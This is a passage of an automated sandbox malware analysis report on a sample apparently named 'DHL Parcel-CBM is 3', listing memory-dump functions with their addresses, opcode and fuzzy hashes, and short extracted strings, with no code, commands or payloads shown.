Opcode Fuzzy Hash: c09519fc0cae6e7f5b366fd08f12bcb20d81cd24fcc24f59c857cb0e2a765350
Instruction Fuzzy Hash: 78B012301051048BE3150B50C928BB47560BB42342F0011D8C10A221C18BF404809E11

Function 027B0850 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e59d746b2ecd6c8521330091cbfba3a8ba6055c6aa0ca9cd72f9fa58030528e
Instruction ID: 814b98149527389d6e3fb6ce9d170687523fc6c208d55ec770269416b2e83cde
Opcode Fuzzy Hash: 7e59d746b2ecd6c8521330091cbfba3a8ba6055c6aa0ca9cd72f9fa58030528e
Instruction Fuzzy Hash: 3290023508460C8B49402B95794959DB75C96445267810155A50D429125A6974505A99

Function 027B14D0 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c39161d922512298ae7f54686859643cf2818ad38cede5218c2dbb04db1b6c42
Instruction ID: bd5fe86a476c48feafed01317cc3cc83f093e636585eef8a621cd62bee1bf957
Opcode Fuzzy Hash: c39161d922512298ae7f54686859643cf2818ad38cede5218c2dbb04db1b6c42
Instruction Fuzzy Hash: 4BA002715400058BCE04DF50DFA9414FB25BBC0701305C3949006455628B34A940DE44

Non-executed Functions

Function 027BB328 Relevance: 4.0, Strings: 3, Instructions: 251COMMON

Download Yara Rule

Strings

TJjq, xrefs: 027BB4DA
xbhq, xrefs: 027BB465
Teeq, xrefs: 027BBA5B

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: TJjq$Teeq$xbhq
API String ID: 0-642506051
Opcode ID: c9957e975a0c7145eca81c9c7265f63937215c432e5ff735a29dc65864dcd050
Instruction ID: 3a254abec119332158dacd75b7b360e047bf57e2723e7e09751d17ab7ee8b973
Opcode Fuzzy Hash: c9957e975a0c7145eca81c9c7265f63937215c432e5ff735a29dc65864dcd050
Instruction Fuzzy Hash: 8BC19775E016188FDB59CF6AC984ADDBBF2AF89300F14C1A9D809AB365DB305E81CF50

Function 027B7241 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

4'eq, xrefs: 027B7307
4'eq, xrefs: 027B7332

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq
API String ID: 0-907361030
Opcode ID: 481566361825e5df977d86119d813a0b73c5f2f21236c919a4b02e6bf8a8743e
Instruction ID: bcc189fccea6d82b96ba5fce210ada0b0aeab5226188720ab209bd2c5a5934e4
Opcode Fuzzy Hash: 481566361825e5df977d86119d813a0b73c5f2f21236c919a4b02e6bf8a8743e
Instruction Fuzzy Hash: 4271FDB0E006198FD749EF6AE880A9ABFF2FFD8300F14C529E0059B269EF7459059F51

Function 027B7250 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'eq, xrefs: 027B7307
4'eq, xrefs: 027B7332

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq
API String ID: 0-907361030
Opcode ID: 2db061c28ce624c0f82b6de93fa9b1e1b81bdf29c7c690292e0165776e192e3d
Instruction ID: 944d54b04fd9c0d858c07f10072d95898f21a7db07d66a04f283dc90c636c53c
Opcode Fuzzy Hash: 2db061c28ce624c0f82b6de93fa9b1e1b81bdf29c7c690292e0165776e192e3d
Instruction Fuzzy Hash: 3A71FAB0E006198FDB49EF6AE980A9ABFF2FFD8300F14C529D0059B269EF7459059F51

Function 065C8878 Relevance: 1.9, Strings: 1, Instructions: 608COMMON

Download Yara Rule

Strings

(iq, xrefs: 065C8948

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: e30549bffb6440516c7c9fdd70305639e786cb44f6bbfc6320b0a9dcc049ba66
Instruction ID: 6b0e06f090aeaa034ffbde4747c1d7703f742436908783167471b6ef631a22a9
Opcode Fuzzy Hash: e30549bffb6440516c7c9fdd70305639e786cb44f6bbfc6320b0a9dcc049ba66
Instruction Fuzzy Hash: E0324970B016168FCB98DFA9C49466EFBF2BF88310F14892DE55AD7381DB34A951CB81

Function 0675892E Relevance: 1.6, Strings: 1, Instructions: 387COMMON

Download Yara Rule

Strings

Teeq, xrefs: 06758C22

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: b90440bfb02503100516360cb4df2668ab52bb4a6242bfdf90bae4818206b86e
Instruction ID: 3841b23866b5f8fc31dda771f84aa484c2a10e4a354c103cf5423646bde4e44e
Opcode Fuzzy Hash: b90440bfb02503100516360cb4df2668ab52bb4a6242bfdf90bae4818206b86e
Instruction Fuzzy Hash: BD020870A05228CFEB94DF69D844BA9B7F2FB49300F1181E6D909AB345DB749D84CF52

Function 06759908 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

Teeq, xrefs: 0675999F

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: 1017ac2f10dadadd57b730b9d6cbbb1473e33c4c7a2bc7b4234f6cb540d88979
Instruction ID: a144b749c01d26e0aee15b6e74f727d48e39f429360c15066b5852ffa570ab50
Opcode Fuzzy Hash: 1017ac2f10dadadd57b730b9d6cbbb1473e33c4c7a2bc7b4234f6cb540d88979
Instruction Fuzzy Hash: 7DB10770E01258CFEB54DF69D844BADBBF2BF89304F11C0A9EA09AB255D7745985CF40

Function 06759918 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

Teeq, xrefs: 0675999F

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: bff8052532b4cc6f6b3f32555dffb1cc9c3f835705a66d0ff3fbbfd0a5f49f60
Instruction ID: bd6c6353d22b01ddd07450df1277b5f40bbebc963381d2ffc52958454ce6f0d5
Opcode Fuzzy Hash: bff8052532b4cc6f6b3f32555dffb1cc9c3f835705a66d0ff3fbbfd0a5f49f60
Instruction Fuzzy Hash: 32B11770E01258CFEB54DF69D844BADBBF2BB89300F11D0A9DA09AB355DBB45985CF40

Function 065E75E0 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

(, xrefs: 065E88E9

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: d329fdc120b01f51197909cfcd3bac3e1017190776310953dbcdc6e5662c64fd
Instruction ID: 9176dc2ae7e8ac9ffee5ea4e746e131f2a75363a535e73fa78f788807d87b92c
Opcode Fuzzy Hash: d329fdc120b01f51197909cfcd3bac3e1017190776310953dbcdc6e5662c64fd
Instruction Fuzzy Hash: 994168B1D056288BEB58DF6B88486D9BAF7BFC9304F14C1EA840CA6264DB740A858F55

Function 065ED090 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 827c0cac489b50f5609735a171c7a4ca3e1d7623657069f44243bd89887739ba
Instruction ID: 467636c3b0beb9fdbf107979599cbc7634418f6f57f87a9a7897b4a747bb959c
Opcode Fuzzy Hash: 827c0cac489b50f5609735a171c7a4ca3e1d7623657069f44243bd89887739ba
Instruction Fuzzy Hash: 0412A671E046188FDB58CFAAC98069DFBF2FF88304F24C669D459AB219D734A946CF50

Function 069E3008 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b76427efe390ff36b82aac49fecd94253bd5df2b851ffbf3ab3e2a07ef77270
Instruction ID: 5efd5ddc91753c3221e507d4bdd5c4951f37efdeb7c6ca4245f6d3c959303eb8
Opcode Fuzzy Hash: 1b76427efe390ff36b82aac49fecd94253bd5df2b851ffbf3ab3e2a07ef77270
Instruction Fuzzy Hash: 3EC10370E05208DFDB84DFA9D484B9DBBF6BB89300F20906AE419AB755DB349945CF41

Function 069E2FFA Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a273ae8070cdb855f0e35af0e1959cd5ff43ce2e13760a0228eb936d3cefb573
Instruction ID: 258b94bc7337828021c1f2759ec14c086f70ef907a958e3ab16fe69702600a38
Opcode Fuzzy Hash: a273ae8070cdb855f0e35af0e1959cd5ff43ce2e13760a0228eb936d3cefb573
Instruction Fuzzy Hash: 3CC1F374E05208DFDB44DFA9D884B9DBBF2BB89300F20D06AE419AB755DB349985CF41

Function 069EB590 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd19cf5789303980fefe5a243f50fdc602cb3fc9abc67dd4bb847c04c1d839d
Instruction ID: 65af463185d31295c47abb4fa490da8496c2e53dc3c0ea52715e661dd0c8ceb9
Opcode Fuzzy Hash: 3cd19cf5789303980fefe5a243f50fdc602cb3fc9abc67dd4bb847c04c1d839d
Instruction Fuzzy Hash: 4AA14970A05218DFDB94DFA8D944BAEBBF6FB8D314F108029E509AB688DB385C45CF41

Function 069EB5A0 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f8287e05e50c3788701e917d14d34a7d580a89dca96eef3a4a8c516999d76d5
Instruction ID: 2c2f60fc2a9a0d8387c61f9d2265b891e9e62540e506e3590e09f48672f34961
Opcode Fuzzy Hash: 9f8287e05e50c3788701e917d14d34a7d580a89dca96eef3a4a8c516999d76d5
Instruction Fuzzy Hash: 6DA15870A05218DFDB84DFA8D944BAEBBF6FB8D314F109029E409AB688DB385C45CF41

Function 0677BDA0 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bbd4eb771a0d2e2f02ced12d3dd3a9fcfac9b65c00068fbd33b91e05adb6b12
Instruction ID: 37240ae2a1382c3b24274bbd6596ffb0659db8fda4ee16812ea88e725e131da6
Opcode Fuzzy Hash: 0bbd4eb771a0d2e2f02ced12d3dd3a9fcfac9b65c00068fbd33b91e05adb6b12
Instruction Fuzzy Hash: 01914974E04218CFEB84DFA9D884BEDBBF2BB8D304F10906AE419A7255DB785945CF41

Function 0677BD9F Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bae2ed0fa1b22ed9a773ad9ec8ca9d53fc10a7a828581c189cf2f966f295765
Instruction ID: 996b7c3d940bda238beedb016985d555a15e85d8e56f1b08f7f1da48c876e1f8
Opcode Fuzzy Hash: 7bae2ed0fa1b22ed9a773ad9ec8ca9d53fc10a7a828581c189cf2f966f295765
Instruction Fuzzy Hash: 66915974E04218CFDB84DFA9D884BEDBBF2BB8D300F10906AE419A7254DB785985CF41

Function 065E3D00 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dffa3643edf7f3f4e763e8fdd24a6cda71660791b793ae648f313a4e3e2ca33c
Instruction ID: f13c2407fd868bb91d70d509214c27f17361d5028fa909686fbf3985f8d792a0
Opcode Fuzzy Hash: dffa3643edf7f3f4e763e8fdd24a6cda71660791b793ae648f313a4e3e2ca33c
Instruction Fuzzy Hash: 3F91ACB4D05219DFEF48DFA9C6487EDBBF1BB88304F10842AD419A7290D7788A49CF95

Function 0677C0E4 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6785563a8f1bc4874921db2ceefe7da76a5b8bac3369fe70337e3c7c5ad99e0
Instruction ID: 360b0f1744ab2a6c361920da7a79640cd0148df193efbb4c2d7539142a990b66
Opcode Fuzzy Hash: d6785563a8f1bc4874921db2ceefe7da76a5b8bac3369fe70337e3c7c5ad99e0
Instruction Fuzzy Hash: 91914BB4E04208CFDB94DF69D884BADBBF2FB4D300F10906AE419A7255DB389985CF41

Function 06A6E700 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebd9d0bdd7998174d405d1b558d930d5cd2f91cedd371532c416d4e239c363f
Instruction ID: ce3c5819af9f704ffb0ac30a804b10640d68c9ea6254ba86c9f20187aa47a2dc
Opcode Fuzzy Hash: 9ebd9d0bdd7998174d405d1b558d930d5cd2f91cedd371532c416d4e239c363f
Instruction Fuzzy Hash: 3F810A78E09218CFEBA4EF66C8447EDBBF5BF49304F2490A9E009AB252D7745985CF41

Function 069E1512 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c3591bb3631dd657409db34dbf5f14dc910d946ec5efb7037f52020fa2bbca5
Instruction ID: 1f1291db80677d8c0a427a9f3e3b76e964485039a6239854a3664ced235598f9
Opcode Fuzzy Hash: 9c3591bb3631dd657409db34dbf5f14dc910d946ec5efb7037f52020fa2bbca5
Instruction Fuzzy Hash: D8712970E41218CFEBA5DF15C888B9AB7F6FB89300F1084E9E50AA7645D7785E84CF41

Function 065CC660 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8d7c1af84465a32c91d521dfd5a6fdf1b86780d95a64802580f059bc85a7278
Instruction ID: 5e172185c5ddbb27f932791841bffd23e90cf59e09c466f2ba56462f18a77939
Opcode Fuzzy Hash: a8d7c1af84465a32c91d521dfd5a6fdf1b86780d95a64802580f059bc85a7278
Instruction Fuzzy Hash: 6F51F474E06208CFDB90DFA8D544BEDBBF2FB49320F20906AE009A7255D7785945DF41

Function 065CC670 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbf4e66040f07ccd1bfddfc2e279bf28cf8d9facfdd5dad84797b7081d660c83
Instruction ID: ca5105451be44fc5c196fb862593678ffc2887d277e586b610a9e5ae26344f77
Opcode Fuzzy Hash: dbf4e66040f07ccd1bfddfc2e279bf28cf8d9facfdd5dad84797b7081d660c83
Instruction Fuzzy Hash: 71510270E06208CFEB90DFA8D544BADBBF2FB4A320F20902EE009A7255D7785985DF41

Function 027B7C10 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4c7ea20dc0a33abdc481e8306f6c1d767db36f607ea383da7e503e0d295a57
Instruction ID: e294de024a2b906c03063b9e255e6f12e4699a845bb0c4354c7983a8a537fea4
Opcode Fuzzy Hash: fe4c7ea20dc0a33abdc481e8306f6c1d767db36f607ea383da7e503e0d295a57
Instruction Fuzzy Hash: 7761B571D016288FEB69DF6ACD587D9FBB2BF89305F1481EAC409A7264DB750A85CF00

Function 069EB050 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe117ee997a77e632a7824389be04510a0a1728693f616320c548d74008565f1
Instruction ID: ab026a3e6b473f5de54b18b78896cefc5d573c603a54d1c7ae33efe3730d0ea1
Opcode Fuzzy Hash: fe117ee997a77e632a7824389be04510a0a1728693f616320c548d74008565f1
Instruction Fuzzy Hash: 53512C70A00118CFD794EFA8D850AAEBBB6FF8D300F618069E509AB359DB385D46DF41

Function 065ED080 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6445bb52362d6b22daf007321825fc50fa2718d07e6ad279013888423d91f3a6
Instruction ID: 3b819120940a3272f198ce9f8ae1299bfd4844fffa3cff551388f6ec79967c53
Opcode Fuzzy Hash: 6445bb52362d6b22daf007321825fc50fa2718d07e6ad279013888423d91f3a6
Instruction Fuzzy Hash: 364167B1E016188BDB08CFABC94069EFBF3BFC8300F14C17AD958AB264DA3459468F50

Function 067A0023 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116882730.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67a0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca5296a731d14ff1cf01ad1567f5db6691b857cf3ecfd7235ef18ed5a5f8694
Instruction ID: 46c2f34f2166fe765ea85557710bbff9c39f1ab05713aa4c12c743d91462e806
Opcode Fuzzy Hash: 9ca5296a731d14ff1cf01ad1567f5db6691b857cf3ecfd7235ef18ed5a5f8694
Instruction Fuzzy Hash: 6C514171D056588BEB2CCF2B8D446DAFAF7AFC9300F14C1FA984CA6265DB7009868F51

Function 06750007 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b61f2faee65135f1e90228e8fc3e23ad8c858a35b08b1d4d93fe88c99da4fce6
Instruction ID: 8711827ef777ba9b3ed4dcb78dba87584a77dc7f356d8b57e8c1e3e50669978b
Opcode Fuzzy Hash: b61f2faee65135f1e90228e8fc3e23ad8c858a35b08b1d4d93fe88c99da4fce6
Instruction Fuzzy Hash: 45418C71D05A548FEB59CF6B8C406DABBF3AFC5301F19C1BA8848AA265EB3405468F11

Function 067A0040 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116882730.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67a0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20d3268f3301e59d55a629ce7ae8a60cb4ce5b8bbc6ca1913b576ef64483a5b1
Instruction ID: 142d618ca6e6b8e767268c2fab4e2a476fb8fb1c69a6c09003fba9b7127bba97
Opcode Fuzzy Hash: 20d3268f3301e59d55a629ce7ae8a60cb4ce5b8bbc6ca1913b576ef64483a5b1
Instruction Fuzzy Hash: F8516E71D056588BEB28CF2B8D442DAFAF3AFC8304F14C1FA984CA6265DB700AC58F51

Function 06750040 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc627a86567ee876a0fa3686c330d2081ca284ee45491e8222dfcf30e62797d7
Instruction ID: c6a2ff046bfea1676db28293169be9f68a22e7a334f6c95b7f8ffae4cc62693c
Opcode Fuzzy Hash: fc627a86567ee876a0fa3686c330d2081ca284ee45491e8222dfcf30e62797d7
Instruction Fuzzy Hash: 94416E71D05A588FEB58CF6B9D4079EFAF3AFC8305F14C1B9980CAA255EB7006858F41

Function 027B7C01 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d5809be81ed4d60f54e825b42ad0ed8ae725d6f07fa2f156c4934fe007739c4
Instruction ID: 6c84db71b11a136564ce221567cc46b7d770dbbf70fb44fdb54c99bcb29b72c5
Opcode Fuzzy Hash: 1d5809be81ed4d60f54e825b42ad0ed8ae725d6f07fa2f156c4934fe007739c4
Instruction Fuzzy Hash: D44198B1D066588BEB29CF6ACD5879AFBF6BFC5305F14C1E9C409A6264DB740A85CF00

Function 06A50023 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06af52c313b23721bf9eb924b4010581fc9e4a178c449ea2deabf0dca4573243
Instruction ID: c8824902070e890f89df2173e3ceab7b7d1b40f0490e04c6f7792b99c23889e2
Opcode Fuzzy Hash: 06af52c313b23721bf9eb924b4010581fc9e4a178c449ea2deabf0dca4573243
Instruction Fuzzy Hash: 68313E71D096158BEB69CF2B8C4469AFAF7AFC9300F05C0EAD44CA6255DB300986DF51

Function 065E75DA Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8fa8d5aa24d6d3bfefcbf66d3c0683c318fad6b0d56b704c7acd8139169098
Instruction ID: d9b1a1eba33f30532e8cbaad84dbeff18bce14ff4fbc77f6a366ef38bda18f6e
Opcode Fuzzy Hash: 4e8fa8d5aa24d6d3bfefcbf66d3c0683c318fad6b0d56b704c7acd8139169098
Instruction Fuzzy Hash: F42148B1E056189BEB5CDF6B8C4469AFAF7AFC9300F14C1BAD40CA6264DB700A858E51

Function 06A50040 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff2e57a02878280a2e0515504a2ff1c1f442e13e0aedc16982988fa4edfa63e7
Instruction ID: 159eaf2bafc0ee5b881bf60a4f7e257bb33f7483bbc78b88a8065b197166bc19
Opcode Fuzzy Hash: ff2e57a02878280a2e0515504a2ff1c1f442e13e0aedc16982988fa4edfa63e7
Instruction Fuzzy Hash: 0F21EA71D046298BEB68CF6BCC4479AFAF7AFC8304F04C0BAD91CA6215DB7009869F51

Function 06771660 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad7556c27af46b04e1392211b5f4d6e49383c1bd76dc6614b9c7cee402cb8b95
Instruction ID: 23af2c3a1deafa67ddb049e2ac1742e48101ab8cce1c171cc3885df654fd2691
Opcode Fuzzy Hash: ad7556c27af46b04e1392211b5f4d6e49383c1bd76dc6614b9c7cee402cb8b95
Instruction Fuzzy Hash: 8F21E4B1D046188BEB18CFABC8407DEFBF7AF88300F18C06AC409AA254DB740A458F94

Function 0677165D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

